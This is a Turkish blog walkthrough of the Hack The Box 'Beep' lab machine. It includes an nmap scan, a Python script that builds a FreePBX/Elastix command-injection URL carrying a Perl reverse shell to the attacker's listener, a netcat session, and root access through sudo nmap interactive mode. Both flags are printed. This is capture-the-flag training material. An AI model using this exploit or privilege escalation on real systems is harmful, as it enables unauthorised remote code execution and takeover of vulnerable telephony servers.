İçeriğe geç

Beep

Tarih: 20/11/2021 | Yazar: kuday
Makine Adı Seviye OS Logo
Beep - HTB Easy Linux

Walkthrough

nmap taraması ile başlayalım.

──(root💀kali)-[~]
└─# sleep 50; nmap -p- -A -T4 -Pn 10.10.10.7
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-20 04:57 EST
Stats: 0:02:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 04:59 (0:00:06 remaining)
Stats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.12% done; ETC: 05:02 (0:00:07 remaining)
Stats: 0:05:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.39% done; ETC: 05:02 (0:00:07 remaining)
Stats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 90.91% done; ETC: 05:03 (0:00:08 remaining)
Stats: 0:06:05 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.94% done; ETC: 05:03 (0:00:06 remaining)
Stats: 0:06:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.70% done; ETC: 05:03 (0:00:06 remaining)
Stats: 0:06:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)
Stats: 0:06:49 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.73% done; ETC: 05:03 (0:00:03 remaining)
Nmap scan report for 10.10.10.7 (10.10.10.7)
Host is up (0.093s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL RESP-CODES USER EXPIRE(NEVER) TOP LOGIN-DELAY(0) PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP AUTH-RESP-CODE STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CATENATE IDLE Completed ACL OK CHILDREN ID ATOMIC URLAUTHA0001 NO X-NETSCAPE THREAD=REFERENCES RIGHTS=kxte LIST-SUBSCRIBED LISTEXT CONDSTORE UNSELECT RENAME MAILBOX-REFERRALS ANNOTATEMORE IMAP4 MULTIAPPEND QUOTA NAMESPACE THREAD=ORDEREDSUBJECT BINARY SORT=MODSEQ SORT IMAP4rev1 STARTTLS LITERAL+ UIDPLUS
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2021-11-20T11:01:40+00:00; +59m59s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/20%OT=22%CT=1%CU=38827%PV=Y%DS=2%DC=T%G=Y%TM=6198C8
OS:3F%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=CC%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
OS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 59m58s

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   68.64 ms 10.10.14.1 (10.10.14.1)
2   68.77 ms 10.10.10.7 (10.10.10.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 463.84 seconds

Gerçekten çok fazla port açık ve bu canımı sıkmıştı. 80 ile başladım ve elde ettiğim versiyon bilgilerini araştırıyordum. https://10.10.10.7/admin/config.php adresinde FreePBX 2.8.1.4 on 10.10.10.7 bilgisini elde ettim ve bununla ilgili aramalar yapmaya başladım. https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/master/exploit.py adresinde bir exploit vardı ancak çalıştıramadım. SSL hatası ile karşılaştım ve çözmek için uğraşamadım. Kendim python3'e çevirmeye karar verdim. Bue snada url'yi direkt olarak bana öndürecek şekilde kolay yolu seçtim.


┌──(root💀kali)-[~/10.10.10.7/exp]
└─# cat test.py 
import requests

rhost="10.10.10.7"
lhost="10.10.14.6"
lport=4444
extension="233"

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

print(url)
#requests.get(url, verify=False)

Şimdi bunu çalıştıralım.

┌──(root💀kali)-[~/10.10.10.7/exp]
└─# python3 test.py 
https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.6%3a4444%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A

Adresi aldım tarayıcıya ekledim.


┌──(root💀kali)-[~]
└─# nc -lvp 4444                                                                          1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.6] from beep.localdomain [10.10.10.7] 60262
id
uid=100(asterisk) gid=101(asterisk)
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ pwd
pwd
/tmp
bash-3.2$ cd /home
cd /home
bash-3.2$ alias ls="ls -al"
alias ls="ls -al"
bash-3.2$ ls
ls
total 28
drwxr-xr-x  4 root       root       4096 Apr  7  2017 .
drwxr-xr-x 22 root       root       4096 Nov 20 12:55 ..
drwxrwxr-x  2 fanis      fanis      4096 Apr  7  2017 fanis
drwx------  2 spamfilter spamfilter 4096 Apr  7  2017 spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
total 32
drwxrwxr-x 2 fanis fanis 4096 Apr  7  2017 .
drwxr-xr-x 4 root  root  4096 Apr  7  2017 ..
-rw------- 1 fanis fanis  114 Apr  7  2017 .bash_history
-rw-r--r-- 1 fanis fanis   33 Apr  7  2017 .bash_logout
-rw-r--r-- 1 fanis fanis  176 Apr  7  2017 .bash_profile
-rw-r--r-- 1 fanis fanis  124 Apr  7  2017 .bashrc
-rw-rw-r-- 1 fanis fanis   33 Nov 20 12:55 user.txt
bash-3.2$ cat user.txt
cat user.txt
c923eee6a96abd8008a69532fcd6840d

root olmakta kolaydı.


bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ 

bash-3.2$ 

bash-3.2$ sudo -u root /usr/bin/nmap --interactive
sudo -u root /usr/bin/nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# cd /root
cd /root
sh-3.2# ls
ls
anaconda-ks.cfg            install.log.syslog  webmin-1.570-1.noarch.rpm
elastix-pr-2.2-1.i386.rpm  postnochroot
install.log                root.txt
sh-3.2# cat root.txt
cat root.txt
97b794de414bb98f984d69a8998c4287
Kategori:Walkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir